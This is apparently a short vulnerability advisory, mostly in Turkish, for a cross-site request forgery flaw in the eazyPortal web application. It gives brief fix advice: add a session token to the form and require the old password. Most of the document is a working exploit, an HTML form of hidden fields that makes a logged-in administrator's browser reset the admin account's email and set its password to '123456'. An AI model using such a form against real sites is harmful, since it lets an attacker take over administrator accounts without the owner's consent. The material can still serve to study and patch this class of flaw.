< ------------------- header data start ------------------- >

#############################################################

# Application Name : eazyPortal

# vulnerable Type : XSRF

# Infection : Admin sifresi degistirilebilir ..

# Bug Fix Advice : Form’a Oturum Key’i (Session Token) eklenmeli , eski sifre sorulmalidir ..

# author : _iLLeqaL_ ~ Bug Researchers

#############################################################

< ------------------- header data end of ------------------- >

< -- bug code start -- >

<form action=http://[site].com/[yol]/ method=post>
<input name=p type=hidden value=users />
<input name=a type=hidden value=administrator />
<input name=uedit type=hidden value=1 />
<input name=uname type=hidden value=admin />
<input name=uemail type=hidden value=[email protected] class=inputtext0 maxlength=50 />
<input name=upwd type=hidden value=123456 class=inputtext0 />
<input name=ucpwd type=hidden value=123456 class=inputtext0 />
<input src= http://site.com/yol/tpl/DefaultGreen/img/button_submit.gif></form>

< -- bug code end of -- >